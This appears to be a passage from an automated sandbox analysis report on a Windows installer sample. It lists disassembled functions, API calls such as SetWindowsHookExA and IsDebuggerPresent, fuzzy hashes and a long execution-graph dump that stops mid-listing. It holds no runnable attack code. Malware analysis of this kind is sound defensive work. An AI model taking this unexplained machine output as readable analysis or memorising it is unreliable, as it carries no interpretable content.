                                                                                                                            • API ID: Byte$CharLeadMultiWide___lc_codepage_func___mb_cur_max_func
                                                                                                                            • String ID: 0TN
                                                                                                                            • API String ID: 2785433807-2493106245
                                                                                                                            • Opcode ID: eb52bed4fd196081ad3de77d16a37fe57441e6c0074ebede2c6fa0c3c3b4fbe2
                                                                                                                            • Instruction ID: 2bee799f48231387f0a67e0c030545bbcf893d8fb172e3ae7cdd0433c211cba0
                                                                                                                            • Opcode Fuzzy Hash: eb52bed4fd196081ad3de77d16a37fe57441e6c0074ebede2c6fa0c3c3b4fbe2
                                                                                                                            • Instruction Fuzzy Hash: 27F0F8B59093048B8700EF6AD08154BFBE4BF88258F80892EF988C7614E335D9418B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041A8C0 Relevance: 5.1, APIs: 4, Instructions: 55sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(?,?,?,00000000,0041AAB9), ref: 0041A8E7
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00000000,0041AAB9), ref: 0041A918
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3080175056-0
                                                                                                                            • Opcode ID: cdccd1937c9b095c8fc18888d4c4d2c6edf19b6ba7123c87fd636c86a7712802
                                                                                                                            • Instruction ID: db720c6806ae12fd5bf290d715f33541d704ed4794979f18f67b0a1896bf8f64
                                                                                                                            • Opcode Fuzzy Hash: cdccd1937c9b095c8fc18888d4c4d2c6edf19b6ba7123c87fd636c86a7712802
                                                                                                                            • Instruction Fuzzy Hash: 521151B05165808ED720BB2CADC959B77A4AB40348F564C37C486CB312D739D8E5C65B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CDB0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040D017,?,?,?,?,?,0040C678), ref: 0040CDBE
                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040D017,?,?,?,?,?,0040C678), ref: 0040CDE5
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040D017,?,?,?,?,?,0040C678), ref: 0040CDEC
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040D017,?,?,?,?,?,0040C678), ref: 0040CE0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 682475483-0
                                                                                                                            • Opcode ID: 10ac94bcdbc48f1363dfc042ba998264f8e413be166ee3143bb7a569d2d5f3aa
                                                                                                                            • Instruction ID: a02565725241b1cdc8ed66c8b89302fc1cf70c2a9457a8e7f22a4c644f6e1fd5
                                                                                                                            • Opcode Fuzzy Hash: 10ac94bcdbc48f1363dfc042ba998264f8e413be166ee3143bb7a569d2d5f3aa
                                                                                                                            • Instruction Fuzzy Hash: 04F081B1900740CBCB107F69D9C451B7BB4AF54384F060579DE84AB316E774A805CBAA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:7.4%
                                                                                                                            Total number of Nodes:869
                                                                                                                            Total number of Limit Nodes:80
                                                                                                                            execution_graph 26300 4011b0 26305 404bee 26300->26305 26302 4011b9 SendMessageA SendMessageA 26324 4023f0 26302->26324 26306 404c00 26305->26306 26307 404bf8 26305->26307 26339 40cd59 174 API calls ctype 26306->26339 26338 40c910 170 API calls ctype 26307->26338 26310 404bfe 26311 404c0e 26310->26311 26340 409ac5 106 API calls 2 library calls 26310->26340 26335 4048a3 26311->26335 26314 404c15 26314->26302 26315 404c20 26315->26311 26316 404c26 26315->26316 26341 40cdfb 114 API calls 26316->26341 26318 404c30 26319 404c36 26318->26319 26320 404c4a 26318->26320 26342 404b98 112 API calls ctype 26319->26342 26320->26302 26322 404c3b 26343 40cf1f ShowWindow 26322->26343 26344 402521 69 API calls _malloc 26324->26344 26326 402418 26327 402432 26326->26327 26328 40242b 26326->26328 26345 402370 26327->26345 26355 401510 18 API calls 26328->26355 26330 402430 26330->26327 26332 402446 26333 4011e6 26332->26333 26356 4021e0 120 API calls __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 26332->26356 26336 4048b8 EndDialog 26335->26336 26337 4048ac 26335->26337 26336->26314 26337->26336 26338->26310 26339->26310 26340->26315 26341->26318 26342->26322 26343->26320 26344->26326 26346 4023cd 26345->26346 26347 40238d 26345->26347 26348 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 26346->26348 26357 401d00 26347->26357 26349 4023dd 26348->26349 26349->26332 26352 4023b3 26362 41d773 26352->26362 26354 4023c6 26354->26332 26355->26330 26356->26333 26370 41ec90 26357->26370 26359 401d1c ShellExecuteExW 26360 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 26359->26360 26361 401d8e 26360->26361 26361->26346 26361->26352 26363 41d77b 26362->26363 26364 41d77d IsDebuggerPresent 26362->26364 26363->26354 26372 42a832 26364->26372 26367 42207d SetUnhandledExceptionFilter UnhandledExceptionFilter 26368 4220a2 GetCurrentProcess TerminateProcess 26367->26368 26369 42209a __invoke_watson 26367->26369 26368->26354 26369->26368 26371 41ec9c __VEC_memzero 26370->26371 26371->26359 26372->26367 26373 409e61 26374 409e83 26373->26374 26375 409e6f PostMessageA 26373->26375 26375->26374 26376 41e3d0 26425 42066c 26376->26425 26378 41e3dc GetStartupInfoA GetProcessHeap HeapAlloc 26379 41e41b GetVersionExA 26378->26379 26380 41e40e 26378->26380 26382 41e439 GetProcessHeap HeapFree 26379->26382 26383 41e42b GetProcessHeap HeapFree 26379->26383 26505 41e36b 69 API calls 3 library calls 26380->26505 26385 41e465 26382->26385 26384 41e415 _realloc 26383->26384 26426 422863 HeapCreate 26385->26426 26387 41e4a6 26388 41e4b2 26387->26388 26506 41e36b 69 API calls 3 library calls 26387->26506 26436 422465 GetModuleHandleA 26388->26436 26391 41e4b8 26392 41e4c3 __RTC_Initialize 26391->26392 26507 41e36b 69 API calls 3 library calls 26391->26507 26469 42470d 26392->26469 26395 41e4d1 26396 41e4dd GetCommandLineA 26395->26396 26508 41e063 69 API calls 3 library calls 26395->26508 26486 4245d8 78 API calls 2 library calls 26396->26486 26399 41e4ed 26509 42451f 113 API calls 3 library calls 26399->26509 26400 41e4dc 26400->26396 26402 41e4f7 26403 41e503 26402->26403 26404 41e4fb 26402->26404 26487 4242ac 112 API calls 6 library calls 26403->26487 26510 41e063 69 API calls 3 library calls 26404->26510 26407 41e502 26407->26403 26408 41e508 26409 41e514 26408->26409 26410 41e50c 26408->26410 26412 41e513 26409->26412 26413 41e526 26409->26413 26511 41e063 69 API calls 3 library calls 26410->26511 26412->26409 26512 41e063 69 API calls 3 library calls 26412->26512 26488 42424f 112 API calls 2 library calls 26413->26488 26416 41e525 26416->26413 26417 41e52b 26418 41e530 26417->26418 26489 430fd8 26417->26489 26418->26417 26421 41e556 26513 41e301 72 API calls _doexit 26421->26513 26424 41e55b 26424->26384 26425->26378 26427 422883 26426->26427 26428 422886 26426->26428 26427->26387 26514 422808 69 API calls 3 library calls 26428->26514 26430 42288b 26431 422895 26430->26431 26432 4228b9 26430->26432 26515 422a64 HeapAlloc 26431->26515 26432->26387 26434 42289f 26434->26432 26435 4228a4 HeapDestroy 26434->26435 26435->26427 26437 422480 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26436->26437 26438 422477 26436->26438 26440 4224ca TlsAlloc 26437->26440 26516 4221b8 72 API calls 2 library calls 26438->26516 26443 4225e4 26440->26443 26444 422518 TlsSetValue 26440->26444 26441 42247c 26441->26391 26443->26391 26444->26443 26445 422529 26444->26445 26517 41e31f 5 API calls 3 library calls 26445->26517 26447 42252e 26518 4220b6 TlsGetValue 26447->26518 26450 4220b6 __encode_pointer 5 API calls 26451 422549 26450->26451 26452 4220b6 __encode_pointer 5 API calls 26451->26452 26453 422559 26452->26453 26454 4220b6 __encode_pointer 5 API calls 26453->26454 26455 422569 26454->26455 26527 4228bd 69 API calls ___crtInitCritSecAndSpinCount 26455->26527 26457 422576 26458 4225df 26457->26458 26528 422122 TlsGetValue 26457->26528 26544 4221b8 72 API calls 2 library calls 26458->26544 26464 422122 __decode_pointer 5 API calls 26465 4225bd 26464->26465 26465->26458 26466 4225c4 26465->26466 26543 4221f5 69 API calls 4 library calls 26466->26543 26468 4225cc GetCurrentThreadId 26468->26443 26575 42066c 26469->26575 26471 424719 GetStartupInfoA 26472 422629 __calloc_crt 69 API calls 26471->26472 26480 42473a 26472->26480 26473 424944 _realloc 26473->26395 26474 4248c1 GetStdHandle 26479 42488b 26474->26479 26475 422629 __calloc_crt 69 API calls 26475->26480 26476 424926 SetHandleCount 26476->26473 26477 4248d3 GetFileType 26477->26479 26478 42480e 26478->26479 26481 424842 26478->26481 26482 424837 GetFileType 26478->26482 26479->26474 26479->26476 26479->26477 26485 4248ea 26479->26485 26480->26473 26480->26475 26480->26478 26480->26479 26481->26473 26481->26478 26576 42418a 69 API calls 5 library calls 26481->26576 26482->26478 26482->26481 26485->26473 26485->26479 26577 42418a 69 API calls 5 library calls 26485->26577 26486->26399 26487->26408 26488->26417 26490 43100e 26489->26490 26578 40580c 26490->26578 26498 41e547 26498->26421 26502 41e2df 26498->26502 26499 431055 26621 419568 121 API calls ctype 26499->26621 27075 41e211 26502->27075 26504 41e2ec 26504->26421 26505->26384 26506->26388 26507->26392 26508->26400 26509->26402 26510->26407 26511->26412 26512->26416 26513->26424 26514->26430 26515->26434 26516->26441 26517->26447 26519 4220ea GetModuleHandleA 26518->26519 26520 4220c9 26518->26520 26522 422113 26519->26522 26523 4220f9 GetProcAddress 26519->26523 26520->26519 26521 4220d3 TlsGetValue 26520->26521 26525 4220de 26521->26525 26522->26450 26524 4220e2 26523->26524 26524->26522 26526 422109 RtlEncodePointer 26524->26526 26525->26519 26525->26524 26526->26522 26527->26457 26529 422156 GetModuleHandleA 26528->26529 26530 422135 26528->26530 26532 422165 GetProcAddress 26529->26532 26533 42217f 26529->26533 26530->26529 26531 42213f TlsGetValue 26530->26531 26534 42214a 26531->26534 26536 42214e 26532->26536 26533->26458 26537 422629 26533->26537 26534->26529 26534->26536 26535 422175 RtlDecodePointer 26535->26533 26536->26533 26536->26535 26539 42262d 26537->26539 26540 4225a3 26539->26540 26541 42264d Sleep 26539->26541 26545 41d97f 26539->26545 26540->26458 26540->26464 26542 422662 26541->26542 26542->26539 26542->26540 26543->26468 26544->26443 26546 41d98b _realloc 26545->26546 26547 41d9a3 26546->26547 26557 41d9c2 _memset 26546->26557 26558 41ec4c 26547->26558 26550 41da34 RtlAllocateHeap 26550->26557 26552 41d9b8 _realloc 26552->26539 26557->26550 26557->26552 26562 422a33 26557->26562 26569 423280 5 API calls 2 library calls 26557->26569 26570 41da7b LeaveCriticalSection _doexit 26557->26570 26571 42356d 5 API calls __decode_pointer 26557->26571 26572 4222a9 69 API calls 5 library calls 26558->26572 26560 41d9a8 26561 423695 5 API calls 2 library calls 26560->26561 26563 422a46 26562->26563 26564 422a59 EnterCriticalSection 26562->26564 26573 422970 69 API calls 9 library calls 26563->26573 26564->26557 26566 422a4c 26566->26564 26574 41e063 69 API calls 3 library calls 26566->26574 26568 422a58 26568->26564 26569->26557 26570->26557 26571->26557 26572->26560 26573->26566 26574->26568 26575->26471 26576->26481 26577->26485 26622 4070a0 26578->26622 26581 40706d 26582 40e7cc ctype 106 API calls 26581->26582 26585 40707c 26582->26585 26583 40709f 26586 419ced SetErrorMode SetErrorMode 26583->26586 26585->26583 26670 40e2d5 7 API calls 2 library calls 26585->26670 26587 40706d ctype 112 API calls 26586->26587 26588 419d05 26587->26588 26671 4068d0 26588->26671 26591 40706d ctype 112 API calls 26592 419d1b 26591->26592 26593 419d3a 26592->26593 26679 419b6e 26592->26679 26595 40706d ctype 112 API calls 26593->26595 26596 419d3f 26595->26596 26597 419d4b GetModuleHandleA 26596->26597 26701 405de6 26596->26701 26599 419d6b 26597->26599 26600 419d5a GetProcAddress 26597->26600 26599->26499 26601 401030 InitCommonControlsEx 26599->26601 26614 401110 26599->26614 26600->26599 26765 402e39 26601->26765 26608 401110 113 API calls 26609 4010a4 26608->26609 26785 404f3c 26609->26785 26611 4010bd 26832 4047df 113 API calls 2 library calls 26611->26832 26613 4010d1 26613->26499 27066 40486a 26614->27066 26616 401140 26617 40706d ctype 112 API calls 26616->26617 26618 401153 26617->26618 26619 40706d ctype 112 API calls 26618->26619 26620 401158 LoadIconA 26619->26620 26620->26499 26621->26498 26623 40706d ctype 112 API calls 26622->26623 26624 4070a5 26623->26624 26627 402f49 26624->26627 26630 40e7cc 26627->26630 26629 402f53 26629->26581 26631 40e7d8 __EH_prolog3 26630->26631 26633 40e826 26631->26633 26641 40e3e1 EnterCriticalSection 26631->26641 26662 40d8b0 RaiseException __CxxThrowException@8 26631->26662 26663 40e4f1 TlsAlloc InitializeCriticalSection 26631->26663 26655 40e26e EnterCriticalSection 26633->26655 26638 40e839 26664 40e593 90 API calls 3 library calls 26638->26664 26639 40e84c ctype 26639->26629 26648 40e400 26641->26648 26642 40e439 26665 4014f0 26642->26665 26643 40e44e GlobalHandle GlobalUnlock 26647 4014f0 ctype 82 API calls 26643->26647 26644 40e4d0 LeaveCriticalSection 26644->26631 26645 40e4bc _memset 26645->26644 26650 40e46b GlobalReAlloc 26647->26650 26648->26642 26648->26643 26648->26645 26651 40e475 26650->26651 26652 40e49d GlobalLock 26651->26652 26653 40e480 GlobalHandle GlobalLock 26651->26653 26654 40e48e LeaveCriticalSection 26651->26654 26652->26645 26653->26654 26654->26652 26656 40e285 26655->26656 26657 40e2ac LeaveCriticalSection 26655->26657 26656->26657 26659 40e28a TlsGetValue 26656->26659 26658 40e2b5 26657->26658 26658->26638 26658->26639 26659->26657 26660 40e296 26659->26660 26660->26657 26661 40e29b LeaveCriticalSection 26660->26661 26661->26658 26663->26631 26664->26639 26666 4014fc 26665->26666 26667 40150b GlobalAlloc 26666->26667 26669 401480 82 API calls ctype 26666->26669 26667->26651 26670->26585 26707 4067f3 26671->26707 26674 40691f 26676 406929 SetLastError 26674->26676 26678 406933 26674->26678 26675 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 26677 4069b5 26675->26677 26676->26678 26677->26591 26678->26675 26680 40706d ctype 112 API calls 26679->26680 26681 419b93 GetModuleFileNameA 26680->26681 26682 419bbb 26681->26682 26683 419bc4 PathFindExtensionA 26682->26683 26712 407265 RaiseException __CxxThrowException@8 26682->26712 26685 419bd8 26683->26685 26686 419bdd 26683->26686 26713 407265 RaiseException __CxxThrowException@8 26685->26713 26714 419b30 82 API calls ctype 26686->26714 26689 419bf7 26690 419c00 26689->26690 26715 407265 RaiseException __CxxThrowException@8 26689->26715 26693 419c12 ctype 26690->26693 26716 41ed91 26690->26716 26695 419cd5 26693->26695 26700 41ed91 69 API calls __strdup 26693->26700 26726 40e905 117 API calls ctype 26693->26726 26727 402baf 69 API calls 2 library calls 26693->26727 26728 420d0c 69 API calls __filbuf 26693->26728 26696 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 26695->26696 26698 419ce5 26696->26698 26698->26593 26700->26693 26702 40706d ctype 112 API calls 26701->26702 26703 405deb 26702->26703 26704 405e13 26703->26704 26762 406b4c 26703->26762 26704->26597 26708 406860 GetModuleFileNameW 26707->26708 26709 4067fc GetModuleHandleA 26707->26709 26708->26674 26708->26678 26710 406810 26709->26710 26711 406815 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26709->26711 26710->26708 26711->26708 26712->26683 26713->26686 26714->26689 26715->26690 26717 41eda1 _strlen 26716->26717 26720 41ed9d 26716->26720 26729 41db2b 26717->26729 26719 41edb2 26719->26720 26748 41ea8b 69 API calls __filbuf 26719->26748 26720->26693 26722 41edc2 26722->26720 26723 41edc9 26722->26723 26749 423599 10 API calls 3 library calls 26723->26749 26725 41edd3 26725->26720 26726->26693 26727->26693 26728->26693 26730 41dbd8 26729->26730 26740 41db39 26729->26740 26757 42356d 5 API calls __decode_pointer 26730->26757 26732 41dbde 26734 41ec4c __filbuf 68 API calls 26732->26734 26735 41dbe4 26734->26735 26735->26719 26738 41db9c RtlAllocateHeap 26738->26740 26739 41db4e 26739->26740 26750 423859 69 API calls __NMSG_WRITE 26739->26750 26751 4236b9 69 API calls 6 library calls 26739->26751 26752 41e0ad 26739->26752 26740->26738 26740->26739 26742 41dbcf 26740->26742 26743 41dbc3 26740->26743 26746 41dbc1 26740->26746 26755 41dadc 69 API calls 4 library calls 26740->26755 26756 42356d 5 API calls __decode_pointer 26740->26756 26742->26719 26745 41ec4c __filbuf 68 API calls 26743->26745 26745->26746 26747 41ec4c __filbuf 68 API calls 26746->26747 26747->26742 26748->26722 26749->26725 26750->26739 26751->26739 26758 41e087 GetModuleHandleA 26752->26758 26755->26740 26756->26740 26757->26732 26759 41e096 GetProcAddress 26758->26759 26760 41e0ac ExitProcess 26758->26760 26759->26760 26761 41e0a6 26759->26761 26761->26760 26763 40e7cc ctype 106 API calls 26762->26763 26764 405df7 GetCurrentThreadId SetWindowsHookExA 26763->26764 26764->26704 26766 402e42 26765->26766 26767 401084 26766->26767 26768 40706d ctype 112 API calls 26766->26768 26770 404011 26767->26770 26769 402e5a InterlockedExchange 26768->26769 26769->26767 26771 404029 26770->26771 26772 40401a 26770->26772 26774 40706d ctype 112 API calls 26771->26774 26833 40e2d5 7 API calls 2 library calls 26772->26833 26775 40108b 26774->26775 26776 4045d3 26775->26776 26834 41d8f1 26776->26834 26778 4045de 26779 41ed91 __strdup 69 API calls 26778->26779 26780 4045e7 26779->26780 26781 41d8f1 _realloc 69 API calls 26780->26781 26782 4045f2 26781->26782 26783 41ed91 __strdup 69 API calls 26782->26783 26784 40109a 26783->26784 26784->26608 26786 404f48 __EH_prolog3_catch 26785->26786 26787 40706d ctype 112 API calls 26786->26787 26788 404f5e 26787->26788 26789 404f87 26788->26789 26790 40706d ctype 112 API calls 26788->26790 26791 404f98 26789->26791 26792 404f8c LockResource 26789->26792 26793 404f6d FindResourceA LoadResource 26790->26793 26796 404f9d ctype 26791->26796 26849 404a74 26791->26849 26792->26791 26793->26789 26796->26611 26799 404fc2 GetDesktopWindow 26801 404fcd IsWindowEnabled 26799->26801 26828 40501c 26799->26828 26803 404fda EnableWindow 26801->26803 26801->26828 26917 402551 112 API calls 26803->26917 26808 405041 26809 405080 26808->26809 26810 40506a 26808->26810 26920 40ce51 26808->26920 26812 4050b1 26809->26812 26928 40cf5b EnableWindow 26809->26928 26810->26809 26924 40d105 26810->26924 26811 404ff1 26811->26828 26918 40cf40 IsWindowEnabled 26811->26918 26818 4050c1 26812->26818 26819 4050b6 EnableWindow 26812->26819 26817 405057 26923 409d12 131 API calls 26817->26923 26822 4050c6 GetActiveWindow 26818->26822 26823 4050da 26818->26823 26819->26818 26820 40500f 26820->26828 26919 40cf5b EnableWindow 26820->26919 26822->26823 26826 4050d1 SetActiveWindow 26822->26826 26929 404aae 115 API calls ctype 26823->26929 26826->26823 26827 405068 26827->26810 26865 40bc3c 26828->26865 26830 4050e8 26830->26796 26831 4050ed FreeResource 26830->26831 26831->26796 26832->26613 26833->26771 26835 41d8fd _realloc 26834->26835 26836 41d976 _realloc 26835->26836 26838 422a33 __lock 67 API calls 26835->26838 26846 41d93c 26835->26846 26836->26778 26837 41d951 HeapFree 26837->26836 26839 41d963 26837->26839 26843 41d914 ___sbh_find_block 26838->26843 26840 41ec4c __filbuf 67 API calls 26839->26840 26841 41d968 GetLastError 26840->26841 26841->26836 26842 41d92e 26848 41d947 LeaveCriticalSection _doexit 26842->26848 26843->26842 26847 422ad7 VirtualFree VirtualFree HeapFree __VEC_memcpy __fptostr 26843->26847 26846->26836 26846->26837 26847->26842 26848->26846 26850 40706d ctype 112 API calls 26849->26850 26851 404a7d 26850->26851 26852 404a8d 26851->26852 26947 4065e8 112 API calls 26851->26947 26930 40654a 26852->26930 26856 40bc3c 108 API calls 26857 404aa9 26856->26857 26858 40a224 26857->26858 26859 40e7cc ctype 106 API calls 26858->26859 26860 40a234 26859->26860 26861 40706d ctype 112 API calls 26860->26861 26862 40a244 26861->26862 26863 404fb4 26862->26863 26864 40a251 UnhookWindowsHookEx 26862->26864 26863->26799 26863->26828 26864->26863 26866 40e7cc ctype 106 API calls 26865->26866 26867 40bc4c 26866->26867 26869 40bc57 26867->26869 26950 40d8b0 RaiseException __CxxThrowException@8 26867->26950 26870 40502d 26869->26870 26871 40bc67 GetCurrentThreadId SetWindowsHookExA 26869->26871 26874 40a17c 26870->26874 26871->26870 26872 40bc84 26871->26872 26951 40d87c RaiseException __CxxThrowException@8 26872->26951 26952 40a108 26874->26952 26876 40a185 26960 4182b5 26876->26960 26878 40a192 26972 40d141 26878->26972 26881 404d4c 26882 404d58 __EH_prolog3_catch 26881->26882 26883 404d69 26882->26883 26884 40706d ctype 112 API calls 26882->26884 26885 40706d ctype 112 API calls 26883->26885 26884->26883 26886 404d74 26885->26886 26985 40ca66 26886->26985 26889 40ca66 126 API calls 26890 404d91 ctype 26889->26890 26892 404da7 ctype 26890->26892 27028 40db69 26890->27028 26892->26808 26895 404dea 26896 404e1b 26895->26896 26897 404e02 GetSystemMetrics 26895->26897 26898 404e75 26896->26898 27040 417f9f 73 API calls ctype 26896->27040 26897->26898 26899 404e0e 26897->26899 26900 40bc3c 108 API calls 26898->26900 27039 404d24 82 API calls ctype 26899->27039 26903 404e83 CreateDialogIndirectParamA 26900->26903 26909 404eaf ctype 26903->26909 26904 404e3f 27041 417efd 80 API calls __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 26904->27041 26906 404e4e 27042 417c27 GlobalFree 26906->27042 26911 40a224 113 API calls 26909->26911 26910 404e65 26910->26898 26912 404e6a GlobalLock 26910->26912 26913 404ef5 26911->26913 26912->26898 26914 404f16 26913->26914 26915 404f0d DestroyWindow 26913->26915 26914->26892 26916 404f1b GlobalUnlock GlobalFree 26914->26916 26915->26914 26916->26892 26917->26811 26918->26820 26919->26828 26921 40ce63 26920->26921 26922 40ce57 GetWindowLongA 26920->26922 26922->26817 26923->26827 26925 40d135 26924->26925 26926 40d10e SetWindowPos 26924->26926 26926->26809 26928->26812 26929->26830 26931 406579 GetWindowLongA 26930->26931 26932 40655e 26930->26932 26933 406570 26931->26933 26934 406589 GetParent 26931->26934 26948 406473 106 API calls 26932->26948 26938 4065a3 26933->26938 26939 40659a GetParent 26933->26939 26937 40656c 26934->26937 26936 406563 26936->26937 26949 402551 112 API calls 26936->26949 26937->26931 26937->26933 26940 4065b4 26938->26940 26942 4065ab GetLastActivePopup 26938->26942 26939->26938 26939->26939 26943 404aa1 26940->26943 26944 4065c0 IsWindowEnabled 26940->26944 26942->26940 26943->26856 26944->26943 26945 4065cb 26944->26945 26945->26943 26946 4065cf EnableWindow 26945->26946 26946->26943 26947->26852 26948->26936 26949->26937 26953 40a114 __EH_prolog3 26952->26953 26954 4070a0 ctype 112 API calls 26953->26954 26955 40a119 ctype 26954->26955 26956 40a160 ctype 26955->26956 26977 402521 69 API calls _malloc 26955->26977 26956->26876 26958 40a13a 26958->26956 26978 41822c 70 API calls 2 library calls 26958->26978 26961 4182c1 __EH_prolog3_catch 26960->26961 26964 4182ca ctype 26961->26964 26979 41908f RaiseException ctype 26961->26979 26963 4182dd 26963->26964 26980 41908f RaiseException ctype 26963->26980 26964->26878 26966 4182ea ctype 26966->26964 26981 41c60a 70 API calls 26966->26981 26968 418319 26969 418324 26968->26969 26982 40d87c RaiseException __CxxThrowException@8 26968->26982 26983 419241 70 API calls ctype 26969->26983 26973 40d148 26972->26973 26974 405035 26972->26974 26973->26974 26975 40d14e GetParent 26973->26975 26974->26881 26984 41908f RaiseException ctype 26975->26984 26977->26958 26978->26956 26979->26963 26980->26966 26981->26968 26983->26964 26984->26974 26986 40706d ctype 112 API calls 26985->26986 26988 40ca71 _memset 26986->26988 26987 404d87 26987->26889 26988->26987 26989 40706d ctype 112 API calls 26988->26989 26990 40caa9 26989->26990 26991 40cada 26990->26991 27055 40c882 118 API calls 2 library calls 26990->27055 26998 40cafc 26991->26998 27056 40c882 118 API calls 2 library calls 26991->27056 26996 40cb49 26997 40cb76 26996->26997 27059 40ca25 120 API calls ctype 26996->27059 27001 40cb97 26997->27001 27043 40a6a7 26997->27043 26999 40cb23 26998->26999 27057 40c882 118 API calls 2 library calls 26998->27057 26999->26996 27058 40ca25 120 API calls ctype 26999->27058 27003 40cbb8 27001->27003 27004 40a6a7 118 API calls 27001->27004 27005 40cbd5 27003->27005 27006 40a6a7 118 API calls 27003->27006 27004->27003 27007 40cbee 27005->27007 27008 40a6a7 118 API calls 27005->27008 27006->27005 27009 40cc0b 27007->27009 27010 40a6a7 118 API calls 27007->27010 27008->27007 27011 40cc28 27009->27011 27012 40a6a7 118 API calls 27009->27012 27010->27009 27013 40cc45 27011->27013 27014 40a6a7 118 API calls 27011->27014 27012->27011 27015 40cc62 27013->27015 27016 40a6a7 118 API calls 27013->27016 27014->27013 27017 40cc7f 27015->27017 27018 40a6a7 118 API calls 27015->27018 27016->27015 27019 40cc98 27017->27019 27020 40a6a7 118 API calls 27017->27020 27018->27017 27021 40ccb1 27019->27021 27022 40a6a7 118 API calls 27019->27022 27020->27019 27023 40ccce 27021->27023 27024 40a6a7 118 API calls 27021->27024 27022->27021 27025 40cceb 27023->27025 27026 40a6a7 118 API calls 27023->27026 27024->27023 27025->26987 27027 40a6a7 118 API calls 27025->27027 27026->27025 27027->26987 27029 40db74 27028->27029 27031 404dd5 27028->27031 27063 401480 82 API calls ctype 27029->27063 27032 417fd6 27031->27032 27034 417fe1 27032->27034 27033 417fe6 27033->26895 27034->27033 27064 40b188 82 API calls ctype 27034->27064 27036 41801c WideCharToMultiByte 27065 404762 82 API calls 2 library calls 27036->27065 27038 418035 27038->26895 27039->26896 27040->26904 27041->26906 27042->26910 27044 40706d ctype 112 API calls 27043->27044 27045 40a6b7 27044->27045 27060 409faa GetModuleHandleA LoadLibraryA GetProcAddress 27045->27060 27047 40a6c1 27048 40a6c5 27047->27048 27049 40a6d6 27047->27049 27061 40a07f 117 API calls ctype 27048->27061 27051 40a6cd 27049->27051 27052 40706d ctype 112 API calls 27049->27052 27051->27001 27053 40a6e8 27052->27053 27062 409f36 115 API calls 2 library calls 27053->27062 27055->26991 27056->26998 27057->26999 27058->26996 27059->26997 27060->27047 27061->27051 27062->27051 27064->27036 27065->27038 27069 408e83 27066->27069 27068 404873 _memset 27068->26616 27072 4054d5 27069->27072 27073 40706d ctype 112 API calls 27072->27073 27074 4054dd 27073->27074 27074->27068 27076 41e21d _realloc 27075->27076 27077 422a33 __lock 69 API calls 27076->27077 27078 41e224 27077->27078 27079 41e27f _doexit 27078->27079 27081 422122 __decode_pointer 5 API calls 27078->27081 27096 41e2ca LeaveCriticalSection _doexit 27079->27096 27083 41e253 27081->27083 27082 41e2ab 27087 41e2c7 _realloc 27082->27087 27097 42295b LeaveCriticalSection 27082->27097 27084 422122 __decode_pointer 5 API calls 27083->27084 27089 41e260 27084->27089 27086 41e2be 27088 41e0ad 